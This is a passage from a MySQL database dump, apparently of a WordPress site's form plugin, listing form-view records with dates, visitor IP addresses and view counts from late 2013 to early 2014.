  `count` mediumint(8) unsigned NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`),
  KEY `date_created` (`date_created`)
) ENGINE=MyISAM AUTO_INCREMENT=6396 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_rg_form_view`
--

LOCK TABLES `lwz_rg_form_view` WRITE;
/*!40000 ALTER TABLE `lwz_rg_form_view` DISABLE KEYS */;
INSERT INTO `lwz_rg_form_view` VALUES (1,1,'2013-10-03 20:50:24','72.83.115.47',4),(2,1,'2013-10-03 22:34:44','216.99.184.50',2),(3,1,'2013-10-04 01:11:26','72.83.115.47',3),(4,1,'2013-10-04 03:05:56','65.55.213.72',2),(5,1,'2013-10-04 05:16:02','185.10.104.194',1),(6,1,'2013-10-04 08:21:22','180.76.5.55',1),(7,1,'2013-10-04 16:35:29','69.197.128.114',2),(8,1,'2013-10-05 12:55:40','66.249.74.201',1),(9,1,'2013-10-05 20:34:47','217.69.133.224',1),(10,1,'2013-10-06 05:54:37','66.249.74.201',2),(11,1,'2013-10-06 13:56:14','66.249.74.201',1),(12,1,'2013-10-07 05:08:22','69.140.244.141',1),(13,1,'2013-10-07 17:41:59','66.249.66.70',1),(14,1,'2013-10-07 20:16:14','38.127.169.18',2),(15,1,'2013-10-08 02:58:24','5.10.83.66',1),(16,1,'2013-10-08 11:08:19','66.249.74.226',1),(17,1,'2013-10-08 13:34:17','173.192.34.95',1),(18,1,'2013-10-08 21:06:23','66.249.74.201',1),(19,1,'2013-10-08 22:40:21','216.214.119.218',1),(20,1,'2013-10-09 20:01:41','216.99.184.50',5),(21,1,'2013-10-10 05:11:13','66.249.74.201',1),(22,1,'2013-10-10 12:02:53','5.10.83.66',1),(23,1,'2013-10-10 16:58:02','66.249.74.201',1),(24,1,'2013-10-11 13:51:00','69.58.178.58',2),(25,1,'2013-10-12 00:33:52','199.21.99.70',1),(26,1,'2013-10-12 01:55:51','66.249.74.201',1),(27,1,'2013-10-12 02:00:08','5.10.83.50',3),(28,1,'2013-10-13 15:53:02','66.249.74.201',1),(29,1,'2013-10-14 08:41:26','220.181.108.144',2),(30,1,'2013-10-14 12:57:36','5.10.83.64',1),(31,1,'2013-10-14 16:48:42','66.249.74.201',1),(32,1,'2013-10-14 17:57:31','63.88.13.250',1),(33,1,'2013-10-14 20:33:08','180.76.6.36',1),(34,1,'2013-10-14 21:15:22','180.76.5.21',1),(35,1,'2013-10-14 22:27:19','74.106.247.68',1),(36,1,'2013-10-14 23:22:29','69.255.200.178',1),(37,1,'2013-10-15 14:31:18','172.56.2.84',2),(38,1,'2013-10-15 17:04:47','180.76.5.178',1),(39,1,'2013-10-16 01:49:36','68.55.118.138',4),(40,1,'2013-10-18 09:27:35','82.80.249.137',2),(41,1,'2013-10-18 14:01:15','70.192.229.109',2),(42,1,'2013-10-18 20:55:12','173.69.164.234',1),(43,1,'2013-10-18 21:58:46','166.78.160.7',1),(44,1,'2013-10-19 00:37:38','66.249.73.6',1),(45,1,'2013-10-19 13:30:10','199.21.99.70',1),(46,1,'2013-10-19 14:13:32','199.21.99.70',1),(47,1,'2013-10-20 04:26:57','74.103.8.13',1),(48,1,'2013-10-20 18:19:05','199.21.99.70',1),(49,1,'2013-10-21 01:55:22','199.21.99.70',1),(50,1,'2013-10-21 17:52:39','180.76.5.60',1),(51,1,'2013-10-21 23:50:24','66.249.74.201',1),(52,1,'2013-10-22 05:01:40','66.249.74.201',1),(53,1,'2013-10-23 09:42:49','173.69.206.50',2),(54,1,'2013-10-24 20:14:05','109.206.168.102',1),(55,1,'2013-10-24 23:23:16','66.249.73.6',1),(56,1,'2013-10-25 12:20:26','182.68.9.157',1),(57,1,'2013-10-26 00:22:00','180.76.5.214',1),(58,1,'2013-10-27 01:27:04','78.158.11.226',2),(59,1,'2013-10-27 13:15:33','180.76.5.178',1),(60,1,'2013-10-29 09:08:40','66.249.74.223',1),(61,1,'2013-10-30 00:50:10','208.43.225.84',2),(62,1,'2013-10-30 09:31:54','80.248.64.222',1),(63,1,'2013-10-30 10:54:59','178.255.215.67',1),(64,1,'2013-10-30 19:57:46','66.249.74.201',1),(65,1,'2013-10-31 13:50:15','66.249.74.204',1),(66,1,'2013-11-01 13:15:18','157.56.92.178',1),(67,1,'2013-11-01 20:03:30','66.249.74.201',1),(68,1,'2013-11-03 07:34:57','66.249.74.224',1),(69,1,'2013-11-04 03:47:12','198.199.73.229',2),(70,1,'2013-11-04 11:01:36','66.249.74.205',2),(71,1,'2013-11-04 17:04:08','144.76.69.142',2),(72,1,'2013-11-04 21:07:14','174.231.0.25',1),(73,1,'2013-11-05 17:03:02','66.249.66.70',1),(74,1,'2013-11-06 14:38:51','180.76.5.142',1),(75,1,'2013-11-07 07:03:28','66.249.66.88',1),(76,1,'2013-11-08 00:32:38','70.192.223.60',1),(77,1,'2013-11-09 05:06:53','96.225.77.14',4),(78,1,'2013-11-09 10:48:54','220.181.108.118',1),(79,1,'2013-11-09 11:55:35','123.125.71.45',1),(80,1,'2013-11-09 14:56:03','66.249.74.205',1),(81,1,'2013-11-10 18:07:53','66.249.74.201',1),(82,1,'2013-11-11 10:25:09','66.249.74.210',1),(83,1,'2013-11-11 14:46:28','66.249.74.220',1),(84,1,'2013-11-11 17:25:17','69.58.178.58',2),(85,1,'2013-11-11 20:49:08','180.76.5.17',1),(86,1,'2013-11-12 02:54:09','173.64.114.83',1),(87,1,'2013-11-12 08:38:28','173.192.34.95',1),(88,1,'2013-11-12 10:47:16','66.249.74.208',1),(89,1,'2013-11-12 17:45:06','66.249.74.201',1),(90,1,'2013-11-13 20:33:04','208.115.113.86',1),(91,1,'2013-11-13 21:02:44','66.249.74.201',1),(92,1,'2013-11-14 01:20:31','162.243.39.52',2),(93,1,'2013-11-14 21:08:24','65.196.83.140',2),(94,1,'2013-11-14 22:45:34','173.69.177.200',1),(95,1,'2013-11-15 00:45:28','174.76.140.74',1),(96,1,'2013-11-15 05:34:45','107.20.21.74',2),(97,1,'2013-11-15 07:24:13','66.249.74.222',1),(98,1,'2013-11-16 18:50:43','146.120.166.189',1),(99,1,'2013-11-16 19:08:10','66.249.74.201',1),(100,1,'2013-11-17 02:37:38','178.255.215.67',1),(101,1,'2013-11-17 14:56:22','71.179.251.179',1),(102,1,'2013-11-17 17:35:18','66.249.74.201',1),(103,1,'2013-11-18 06:55:58','157.55.35.76',1),(104,1,'2013-11-18 08:13:16','66.249.74.232',1),(105,1,'2013-11-18 18:26:48','5.9.27.74',2),(106,1,'2013-11-19 07:06:36','70.192.218.84',1),(107,1,'2013-11-19 13:29:38','66.249.74.218',2),(108,1,'2013-11-19 18:23:51','164.82.32.13',1),(109,1,'2013-11-19 19:33:58','208.78.148.18',2),(110,1,'2013-11-20 05:33:29','98.218.115.124',1),(111,1,'2013-11-20 21:05:22','68.54.163.27',1),(112,1,'2013-11-21 04:35:52','66.249.74.201',1),(113,1,'2013-11-21 12:58:41','180.76.6.232',1),(114,1,'2013-11-21 23:15:40','66.249.74.201',1),(115,1,'2013-11-22 06:42:31','174.127.133.89',1),(116,1,'2013-11-22 12:45:56','66.249.74.216',1),(117,1,'2013-11-22 13:57:31','66.249.74.202',1),(118,1,'2013-11-22 16:09:28','149.101.1.117',2),(119,1,'2013-11-22 22:27:53','123.125.71.32',1),(120,1,'2013-11-23 20:38:16','180.76.5.10',1),(121,1,'2013-11-24 01:05:17','66.249.74.201',1),(122,1,'2013-11-24 05:11:02','162.243.39.228',2),(123,1,'2013-11-24 13:07:36','209.190.12.66',1),(124,1,'2013-11-25 02:27:19','66.249.74.201',1),(125,1,'2013-11-25 17:29:32','8.20.49.203',2),(126,1,'2013-11-25 19:11:18','66.249.74.201',2),(127,1,'2013-11-25 20:54:54','74.103.8.13',1),(128,1,'2013-11-25 21:00:10','74.103.8.13',1),(129,1,'2013-11-25 22:10:37','74.103.8.13',1),(130,1,'2013-11-26 12:38:25','206.16.96.144',1),(131,1,'2013-11-27 06:32:10','208.115.111.70',1),(132,1,'2013-11-28 16:57:18','66.249.74.201',1),(133,1,'2013-11-28 20:16:36','208.115.113.86',1),(134,1,'2013-11-29 09:28:04','199.19.72.101',2),(135,1,'2013-11-29 13:51:34','180.76.5.90',1),(136,1,'2013-11-29 16:17:05','123.125.68.121',1),(137,1,'2013-11-29 23:30:29','123.125.68.123',1),(138,1,'2013-11-30 06:15:07','24.46.226.2',1),(139,1,'2013-11-30 09:57:30','94.23.233.204',1),(140,1,'2013-11-30 12:54:38','66.249.74.201',1),(141,1,'2013-11-30 21:06:33','74.103.8.13',1),(142,1,'2013-12-01 01:09:21','192.237.219.34',1),(143,1,'2013-12-01 04:55:59','162.243.109.34',2),(144,1,'2013-12-02 11:04:59','5.9.27.74',2),(145,1,'2013-12-02 19:23:57','66.249.74.201',1),(146,1,'2013-12-03 21:43:35','66.249.75.70',1),(147,1,'2013-12-04 03:41:30','195.42.102.75',2),(148,1,'2013-12-04 04:21:34','66.249.75.70',1),(149,1,'2013-12-04 21:09:25','66.249.74.201',1),(150,1,'2013-12-05 03:49:18','74.103.8.13',1),(151,1,'2013-12-05 06:07:47','66.249.74.201',1),(152,1,'2013-12-05 08:44:04','66.249.74.201',1),(153,1,'2013-12-05 12:56:54','208.43.255.31',2),(154,1,'2013-12-05 16:52:54','157.55.32.236',1),(155,1,'2013-12-05 19:58:34','66.249.74.201',1),(156,1,'2013-12-06 01:26:03','74.61.254.173',1),(157,1,'2013-12-06 03:40:32','74.61.254.173',1),(158,1,'2013-12-06 12:10:20','66.249.74.201',1),(159,1,'2013-12-06 15:24:55','66.249.74.201',2),(160,1,'2013-12-06 17:25:20','66.249.74.201',1),(161,1,'2013-12-07 20:50:35','98.233.133.87',1),(162,1,'2013-12-08 16:52:25','66.249.74.201',1),(163,1,'2013-12-10 08:37:27','162.242.158.108',1),(164,1,'2013-12-10 15:23:07','66.249.74.201',1),(165,1,'2013-12-11 22:11:32','69.58.178.59',2),(166,1,'2013-12-12 03:22:42','66.249.74.201',1),(167,1,'2013-12-12 10:30:46','208.115.111.70',1),(168,1,'2013-12-12 14:19:44','208.251.200.147',1),(169,1,'2013-12-12 18:03:15','66.87.82.241',1),(170,1,'2013-12-12 20:31:36','66.249.74.201',1),(171,1,'2013-12-12 21:50:57','146.120.158.130',1),(172,1,'2013-12-13 14:52:17','66.249.73.6',1),(173,1,'2013-12-13 20:25:18','208.115.113.86',1),(174,1,'2013-12-14 17:23:35','178.255.215.67',1),(175,1,'2013-12-14 20:11:30','5.226.86.83',5),(176,1,'2013-12-15 02:32:50','69.251.30.167',1),(177,1,'2013-12-15 06:09:30','157.55.34.175',2),(178,1,'2013-12-16 00:34:59','66.249.73.6',1),(179,1,'2013-12-16 02:09:53','5.9.112.67',2),(180,1,'2013-12-16 21:17:32','72.81.139.123',3),(181,1,'2013-12-17 03:03:35','69.251.30.167',1),(182,1,'2013-12-18 07:42:08','66.249.75.70',1),(183,1,'2013-12-18 11:12:59','66.249.75.70',1),(184,1,'2013-12-19 09:33:11','108.34.217.56',2),(185,1,'2013-12-19 15:33:06','68.54.163.27',1),(186,1,'2013-12-20 03:13:09','66.249.73.6',2),(187,1,'2013-12-20 23:17:55','65.55.213.72',2),(188,1,'2013-12-21 00:02:57','66.249.74.201',1),(189,1,'2013-12-21 13:13:15','94.23.233.204',1),(190,1,'2013-12-22 06:41:37','123.125.71.82',1),(191,1,'2013-12-22 16:43:10','180.76.5.24',1),(192,1,'2013-12-24 10:55:04','76.100.45.104',1),(193,1,'2013-12-24 16:11:43','66.249.73.6',3),(194,1,'2013-12-25 22:50:58','66.249.73.6',1),(195,1,'2013-12-26 04:36:26','173.73.31.47',1),(196,1,'2013-12-26 22:58:03','66.249.73.6',1),(197,1,'2013-12-27 20:16:20','220.181.108.153',1),(198,1,'2013-12-27 21:18:11','173.59.36.205',1),(199,1,'2013-12-27 22:53:24','66.249.74.201',1),(200,1,'2013-12-28 01:07:51','66.249.74.201',1),(201,1,'2013-12-28 02:55:36','66.249.74.201',1),(202,1,'2013-12-28 21:29:20','180.76.5.66',1),(203,1,'2013-12-29 02:43:41','69.143.243.12',1),(204,1,'2013-12-29 16:03:38','66.249.75.70',1),(205,1,'2013-12-30 01:41:26','173.69.181.63',1),(206,1,'2013-12-30 14:36:12','144.76.69.142',2),(207,1,'2013-12-30 18:52:02','208.115.111.70',1),(208,1,'2013-12-30 23:23:51','66.249.73.6',1),(209,1,'2013-12-31 05:30:53','173.79.176.88',1),(210,1,'2013-12-31 12:58:10','208.115.113.86',1),(211,1,'2013-12-31 21:55:07','65.55.24.221',1),(212,1,'2014-01-01 15:41:22','66.249.75.70',1),(213,1,'2014-01-01 16:14:36','81.144.138.34',2),(214,1,'2014-01-02 06:24:21','146.120.158.142',1),(215,1,'2014-01-02 22:54:16','66.249.73.6',1),(216,1,'2014-01-03 09:56:43','66.249.73.25',1),(217,1,'2014-01-03 13:00:21','162.213.220.39',2),(218,1,'2014-01-03 20:31:40','68.50.28.174',1),(219,1,'2014-01-03 22:10:02','207.106.190.66',2),(220,1,'2014-01-04 05:16:54','108.15.111.111',1),(221,1,'2014-01-04 14:21:12','180.76.5.204',1),(222,1,'2014-01-05 22:21:42','108.18.224.15',1),(223,1,'2014-01-06 01:15:46','71.120.11.106',1),(224,1,'2014-01-06 20:55:36','66.249.73.6',1),(225,1,'2014-01-07 12:41:49','66.249.73.3',1),(226,1,'2014-01-07 16:52:28','157.55.32.26',1),(227,1,'2014-01-07 20:55:14','91.200.13.100',1),(228,1,'2014-01-07 21:52:32','66.249.73.6',1),(229,1,'2014-01-08 00:16:28','66.249.73.6',1),(230,1,'2014-01-08 01:58:32','96.244.128.29',1),(231,1,'2014-01-08 02:25:41','192.114.71.13',2),(232,1,'2014-01-08 19:27:18','64.124.9.130',1),(233,1,'2014-01-09 08:52:03','66.249.73.33',1),(234,1,'2014-01-09 11:42:41','66.249.73.31',1),(235,1,'2014-01-09 16:58:18','176.9.50.43',1),(236,1,'2014-01-10 17:55:57','50.17.52.104',1),(237,1,'2014-01-11 02:23:54','66.249.73.6',1),(238,1,'2014-01-11 04:02:09','69.197.13.254',2),(239,1,'2014-01-11 17:53:16','173.67.10.56',1),(240,1,'2014-01-11 18:03:26','173.67.10.56',1),(241,1,'2014-01-12 01:22:24','173.79.52.42',1),(242,1,'2014-01-12 06:33:11','69.58.178.56',2),(243,1,'2014-01-12 21:59:33','207.241.237.207',1),(244,1,'2014-01-12 22:14:31','207.241.237.207',3),(245,1,'2014-01-13 00:48:37','178.255.215.67',1),(246,1,'2014-01-13 05:50:57','208.43.255.29',4),(247,1,'2014-01-13 21:12:53','66.249.73.6',1),(248,1,'2014-01-14 02:41:07','68.48.104.154',1),(249,1,'2014-01-14 03:04:37','68.33.1.202',1),(250,1,'2014-01-14 09:02:54','180.76.6.58',3),(251,1,'2014-01-14 13:08:23','64.74.215.130',2),(252,1,'2014-01-14 14:57:35','216.143.112.239',1),(253,1,'2014-01-14 15:18:47','216.143.112.239',1),(254,1,'2014-01-15 01:13:22','96.244.133.50',1),(255,1,'2014-01-15 09:04:00','131.253.24.34',1),(256,1,'2014-01-15 18:45:49','66.249.73.6',1),(257,1,'2014-01-16 02:00:40','76.114.164.247',2),(258,1,'2014-01-16 05:55:05','99.22.24.217',1),(259,1,'2014-01-16 14:33:22','208.115.111.70',1),(260,1,'2014-01-16 22:00:46','66.208.58.100',1),(261,1,'2014-01-17 02:43:55','98.206.171.216',1),(262,1,'2014-01-17 06:13:21','66.249.75.70',1),(263,1,'2014-01-17 12:53:27','208.115.113.86',1),(264,1,'2014-01-18 00:43:15','66.249.73.6',1),(265,1,'2014-01-18 16:36:11','66.249.73.6',1),(266,1,'2014-01-18 21:34:49','66.249.73.6',1),(267,1,'2014-01-19 06:13:18','94.23.233.204',2),(268,1,'2014-01-19 12:17:52','180.76.5.20',1),(269,1,'2014-01-20 04:47:29','108.40.12.128',1),(270,1,'2014-01-20 09:38:27','178.255.80.147',1),(271,1,'2014-01-21 15:23:52','180.76.5.198',1),(272,1,'2014-01-22 13:25:53','173.69.181.88',2),(273,1,'2014-01-22 20:04:02','134.192.116.216',3),(274,1,'2014-01-23 08:12:10','217.69.133.232',1),(275,1,'2014-01-23 19:44:48','66.249.73.6',1),(276,1,'2014-01-24 02:11:41','173.67.10.56',2),(277,1,'2014-01-24 04:22:03','157.56.92.141',2),(278,1,'2014-01-24 19:47:43','99.39.246.61',2),(279,1,'2014-01-25 02:17:15','70.88.119.177',1),(280,1,'2014-01-25 10:02:57','94.23.233.204',1),(281,1,'2014-01-25 12:13:40','66.249.74.165',1),(282,1,'2014-01-26 01:21:33','66.249.74.165',1),(283,1,'2014-01-26 04:51:31','66.249.74.165',1),(284,1,'2014-01-26 12:01:35','173.192.34.95',1),(285,1,'2014-01-27 00:34:32','66.249.74.165',1),(286,1,'2014-01-27 22:39:26','109.206.168.116',1),(287,1,'2014-01-29 01:18:18','68.33.218.155',1),(288,1,'2014-01-29 03:33:32','66.249.74.165',1),(289,1,'2014-01-29 06:47:19','66.249.74.165',1),(290,1,'2014-01-29 15:45:38','77.248.178.202',3),(291,1,'2014-01-29 20:26:48','65.183.8.194',1),(292,1,'2014-01-29 21:09:28','65.183.8.194',1),(293,1,'2014-01-30 15:02:59','95.85.48.60',1),(294,1,'2014-01-31 07:33:35','182.64.44.58',1),(295,1,'2014-01-31 11:50:15','182.64.44.58',1),(296,1,'2014-01-31 18:56:32','204.16.68.108',1),(297,1,'2014-02-01 12:23:09','89.132.188.247',3),(298,1,'2014-02-01 14:44:54','208.115.111.70',1),(299,1,'2014-02-02 00:17:47','72.66.67.48',1),(300,1,'2014-02-02 10:51:30','66.249.73.6',1),(301,1,'2014-02-03 00:26:03','208.115.113.86',2),(302,1,'2014-02-04 00:00:21','66.249.73.6',1),(303,1,'2014-02-04 01:13:52','64.134.180.96',1),(304,1,'2014-02-05 02:42:16','64.134.180.96',1),(305,1,'2014-02-05 03:20:33','71.206.48.75',1),(306,1,'2014-02-05 12:25:01','180.76.6.53',1),(307,1,'2014-02-06 02:21:29','66.249.73.6',1),(308,1,'2014-02-06 22:12:59','66.249.73.6',1),(309,1,'2014-02-08 06:49:26','71.246.253.246',2),(310,1,'2014-02-08 17:17:24','96.244.251.45',1),(311,1,'2014-02-08 22:09:57','66.249.74.222',1),(312,1,'2014-02-09 16:16:15','66.249.74.222',1),(313,1,'2014-02-09 17:53:06','188.143.232.111',1),(314,1,'2014-02-09 21:30:34','66.249.74.222',1),(315,1,'2014-02-10 04:58:32','69.143.123.63',1),(316,1,'2014-02-10 09:23:45','94.23.233.204',1),(317,1,'2014-02-10 16:03:03','144.76.69.142',2),(318,1,'2014-02-10 19:09:07','157.55.33.109',1),(319,2,'2014-02-11 03:46:43','108.3.191.37',1),(320,2,'2014-02-11 08:07:32','180.76.5.176',1),(321,1,'2014-02-11 09:54:52','66.249.74.222',1),(322,1,'2014-02-11 10:29:15','69.58.178.58',2),(323,2,'2014-02-11 10:29:27','69.58.178.58',1),(324,2,'2014-02-11 22:18:06','66.249.73.6',1),(325,2,'2014-02-11 23:09:50','108.3.191.37',4),(326,2,'2014-02-12 00:52:21','71.206.48.75',1),(327,1,'2014-02-12 00:52:44','71.206.48.75',1),(328,1,'2014-02-12 12:12:05','91.232.96.8',5),(329,2,'2014-02-12 12:37:42','206.16.96.144',1),(330,1,'2014-02-12 16:44:03','199.188.176.123',1),(331,2,'2014-02-12 17:10:33','70.192.222.19',4),(332,1,'2014-02-12 17:12:35','166.91.10.218',5),(333,2,'2014-02-12 18:11:45','70.192.222.19',1),(334,1,'2014-02-12 20:50:10','66.249.73.6',1),(335,1,'2014-02-13 04:28:28','96.242.31.27',4),(336,2,'2014-02-13 04:29:27','96.242.31.27',2),(337,2,'2014-02-13 09:07:24','66.249.73.6',1),(338,2,'2014-02-13 10:04:27','68.180.224.227',2),(339,1,'2014-02-13 10:04:29','68.180.224.227',2),(340,2,'2014-02-13 11:59:09','66.249.73.6',1),(341,2,'2014-02-13 12:15:43','66.249.73.6',2),(342,1,'2014-02-13 12:49:37','96.244.251.45',4),(343,1,'2014-02-13 14:31:08','66.249.73.6',1),(344,1,'2014-02-13 16:44:31','66.249.73.6',1),(345,1,'2014-02-13 18:32:18','66.249.73.6',2),(346,2,'2014-02-13 18:48:29','173.193.219.168',1),(347,2,'2014-02-13 19:24:09','68.48.176.210',2),(348,1,'2014-02-14 00:10:55','98.231.155.60',3),(349,1,'2014-02-14 05:35:15','178.255.215.67',1),(350,2,'2014-02-15 00:28:28','66.249.73.6',1),(351,1,'2014-02-15 01:57:51','91.232.96.8',15),(352,2,'2014-02-15 01:58:48','91.232.96.8',5),(353,1,'2014-02-15 04:01:14','98.204.249.80',1),(354,1,'2014-02-15 08:49:57','180.76.6.59',1),(355,1,'2014-02-15 10:17:43','66.249.73.6',1),(356,2,'2014-02-15 13:55:50','96.244.128.29',2),(357,1,'2014-02-16 14:41:21','70.192.195.149',1),(358,2,'2014-02-16 14:47:12','70.192.195.149',1),(359,2,'2014-02-16 15:27:25','96.244.128.29',3),(360,2,'2014-02-16 17:24:04','98.204.246.43',1),(361,2,'2014-02-16 20:38:44','180.76.6.47',1),(362,2,'2014-02-16 23:52:49','72.83.219.117',1),(363,1,'2014-02-17 06:31:23','208.115.111.70',1),(364,2,'2014-02-17 10:30:57','66.249.73.6',1),(365,1,'2014-02-17 16:39:49','69.84.207.246',4),(366,2,'2014-02-17 16:40:23','69.84.207.246',8),(367,2,'2014-02-17 17:42:58','66.87.83.220',1),(368,2,'2014-02-17 18:35:20','8.21.241.65',1),(369,2,'2014-02-17 22:41:07','206.220.32.202',1),(370,2,'2014-02-18 14:05:49','214.1.47.198',1),(371,1,'2014-02-18 15:06:11','220.181.108.87',1),(372,2,'2014-02-18 15:56:00','206.205.21.62',3),(373,1,'2014-02-18 16:02:00','91.232.96.8',5),(374,2,'2014-02-18 18:59:31','220.181.108.113',1),(375,2,'2014-02-18 20:07:18','66.249.73.6',1),(376,1,'2014-02-19 00:25:42','178.255.215.67',1),(377,2,'2014-02-19 11:59:48','72.83.219.117',1),(378,2,'2014-02-19 18:43:30','173.10.191.81',1),(379,2,'2014-02-19 23:59:03','108.3.191.37',1),(380,2,'2014-02-20 03:00:47','173.59.244.57',1),(381,2,'2014-02-20 04:10:38','173.79.18.138',1),(382,1,'2014-02-20 04:51:57','208.115.113.86',1),(383,1,'2014-02-20 08:54:27','124.73.66.135',2),(384,1,'2014-02-20 12:17:28','76.123.97.149',2),(385,1,'2014-02-20 14:27:32','99.185.72.161',1),(386,2,'2014-02-20 16:19:36','216.99.184.50',1),(387,1,'2014-02-20 21:01:07','216.152.249.242',4),(388,2,'2014-02-20 21:01:23','216.152.249.242',1),(389,2,'2014-02-21 02:42:46','96.244.152.247',1),(390,1,'2014-02-21 03:11:16','108.15.101.132',1),(391,2,'2014-02-21 03:13:41','108.15.101.132',1),(392,2,'2014-02-21 04:11:20','108.40.82.6',2),(393,1,'2014-02-21 08:34:12','192.199.245.71',2),(394,2,'2014-02-21 08:34:20','199.192.73.202',1),(395,2,'2014-02-21 09:00:39','66.249.73.6',1),(396,2,'2014-02-21 14:32:57','162.216.102.181',1),(397,2,'2014-02-21 15:00:39','208.253.23.130',1),(398,2,'2014-02-21 22:34:38','208.253.23.130',1),(399,1,'2014-02-22 03:05:51','50.190.133.192',1),(400,2,'2014-02-22 03:06:20','50.190.133.192',1),(401,1,'2014-02-22 07:09:56','174.127.133.92',1),(402,1,'2014-02-22 08:12:11','66.249.73.6',1),(403,1,'2014-02-22 10:19:22','180.76.6.55',1),(404,1,'2014-02-22 16:23:39','76.100.66.9',1),(405,2,'2014-02-22 16:30:48','66.249.73.6',1),(406,2,'2014-02-22 17:00:07','166.216.165.112',1),(407,2,'2014-02-22 19:58:51','66.249.73.6',1),(408,2,'2014-02-22 20:43:56','66.87.83.44',2),(409,2,'2014-02-23 00:10:49','96.231.100.5',5),(410,1,'2014-02-23 00:32:01','96.244.128.29',1),(411,2,'2014-02-23 07:00:59','199.21.99.70',1),(412,2,'2014-02-23 09:54:32','66.249.73.6',1),(413,1,'2014-02-23 13:10:54','66.249.73.6',1),(414,1,'2014-02-23 16:16:26','98.140.236.130',1),(415,2,'2014-02-23 18:02:31','98.218.17.106',1),(416,1,'2014-02-23 19:03:09','173.69.170.211',1),(417,2,'2014-02-23 19:03:50','173.69.170.211',1),(418,1,'2014-02-24 00:43:59','91.232.96.8',3),(419,2,'2014-02-24 00:44:26','91.232.96.8',1),(420,1,'2014-02-24 02:56:37','144.76.69.142',2),(421,2,'2014-02-24 02:56:45','144.76.69.142',2),(422,1,'2014-02-24 05:00:19','76.108.28.179',1),(423,1,'2014-02-24 07:57:02','66.249.73.6',1),(424,2,'2014-02-24 14:28:03','208.115.111.70',1),(425,2,'2014-02-24 16:20:05','199.21.99.70',1),(426,1,'2014-02-24 17:06:10','199.21.99.70',1),(427,1,'2014-02-24 22:53:24','199.21.99.70',1),(428,2,'2014-02-25 02:17:06','66.249.73.6',1),(429,2,'2014-02-25 09:19:15','66.249.73.6',1),(430,2,'2014-02-25 14:35:49','24.104.140.50',1),(431,2,'2014-02-25 18:00:00','24.104.140.35',4),(432,1,'2014-02-25 21:21:21','150.148.14.8',1),(433,1,'2014-02-26 00:20:30','68.33.218.155',1),(434,2,'2014-02-26 00:20:37','68.33.218.155',1),(435,2,'2014-02-26 12:17:46','66.249.73.6',2),(436,1,'2014-02-26 12:17:52','66.249.73.6',1),(437,1,'2014-02-26 13:13:25','178.255.215.67',1),(438,2,'2014-02-26 14:59:11','66.249.73.6',1),(439,2,'2014-02-26 19:25:36','24.104.140.50',1),(440,2,'2014-02-26 20:19:39','24.104.140.35',1),(441,2,'2014-02-26 21:14:19','66.249.88.6',2),(442,2,'2014-02-27 00:34:47','108.15.73.178',2),(443,1,'2014-02-27 06:12:39','66.249.73.6',1),(444,2,'2014-02-27 12:34:44','24.104.140.35',1),(445,2,'2014-02-27 19:00:32','68.48.232.215',3),(446,2,'2014-02-27 20:46:28','23.20.216.175',1),(447,2,'2014-02-27 21:59:44','66.249.73.6',1),(448,2,'2014-02-27 22:13:00','68.33.168.41',11),(449,1,'2014-02-27 23:29:03','54.81.82.45',2),(450,2,'2014-02-27 23:29:04','54.81.82.45',1),(451,1,'2014-02-28 09:49:24','66.249.75.70',1),(452,2,'2014-02-28 10:41:43','50.190.106.158',1),(453,2,'2014-02-28 12:45:05','24.104.140.50',1),(454,2,'2014-02-28 14:39:06','54.242.141.19',4),(455,1,'2014-02-28 14:39:33','54.242.141.19',6),(456,2,'2014-02-28 16:09:10','108.28.190.69',1),(457,2,'2014-02-28 17:27:16','24.104.140.50',1),(458,2,'2014-02-28 18:11:14','24.104.140.50',1),(459,2,'2014-02-28 19:35:43','69.143.80.26',1),(460,2,'2014-02-28 21:25:47','98.117.46.13',1),(461,2,'2014-03-01 01:26:45','74.103.77.162',1),(462,2,'2014-03-01 03:36:45','70.208.129.105',2),(463,1,'2014-03-01 04:18:38','108.40.23.144',2),(464,2,'2014-03-01 04:19:43','108.40.23.144',1),(465,2,'2014-03-01 13:59:03','69.250.66.88',1),(466,1,'2014-03-01 14:15:21','66.249.75.70',1),(467,2,'2014-03-01 14:31:08','69.250.66.88',1),(468,2,'2014-03-01 15:22:55','173.79.33.162',1),(469,2,'2014-03-01 16:47:27','69.140.141.43',1),(470,2,'2014-03-01 18:22:02','68.50.52.13',1),(471,2,'2014-03-01 23:15:00','108.15.31.72',1),(472,2,'2014-03-02 02:09:03','108.50.43.203',1),(473,2,'2014-03-02 05:55:13','173.64.116.162',1),(474,1,'2014-03-02 07:44:25','66.249.76.6',1),(475,1,'2014-03-02 14:20:57','216.151.137.35',1),(476,2,'2014-03-02 16:09:34','108.3.191.37',1),(477,2,'2014-03-02 19:39:29','178.255.215.67',1),(478,2,'2014-03-03 02:42:10','157.56.92.163',1),(479,2,'2014-03-03 03:09:58','108.50.57.129',1),(480,2,'2014-03-03 07:08:31','98.233.143.92',1),(481,1,'2014-03-03 15:02:04','80.86.94.7',2),(482,2,'2014-03-03 15:02:06','80.86.94.7',2),(483,1,'2014-03-03 19:09:21','66.249.76.6',1),(484,2,'2014-03-04 02:08:54','108.15.31.72',3),(485,2,'2014-03-04 03:25:59','108.15.31.72',2),(486,2,'2014-03-04 04:41:22','108.15.73.178',3),(487,2,'2014-03-04 17:46:03','166.137.240.35',1),(488,1,'2014-03-04 21:33:49','70.88.119.177',3),(489,1,'2014-03-04 22:45:32','208.115.111.70',1),(490,1,'2014-03-05 04:16:35','66.249.75.70',1),(491,2,'2014-03-05 15:39:21','24.104.140.35',2),(492,1,'2014-03-05 15:43:11','24.104.140.35',1),(493,2,'2014-03-05 16:31:37','24.104.140.50',3),(494,1,'2014-03-05 16:32:45','24.104.140.50',1),(495,2,'2014-03-05 18:49:00','24.104.140.50',1),(496,2,'2014-03-05 19:19:33','24.104.140.50',4),(497,2,'2014-03-05 23:19:36','68.48.198.197',2),(498,2,'2014-03-06 00:19:00','68.33.169.139',2),(499,2,'2014-03-06 01:18:39','68.55.51.9',1),(500,2,'2014-03-06 02:12:09','108.31.18.194',2),(501,1,'2014-03-06 02:13:01','108.31.18.194',1),(502,2,'2014-03-06 03:07:38','108.3.191.37',2),(503,2,'2014-03-06 14:23:37','24.104.140.35',1),(504,2,'2014-03-06 15:39:21','24.104.140.35',1),(505,2,'2014-03-06 16:17:03','8.28.16.254',3),(506,1,'2014-03-06 20:06:45','66.249.76.6',1),(507,1,'2014-03-06 21:13:44','137.100.97.30',1),(508,1,'2014-03-06 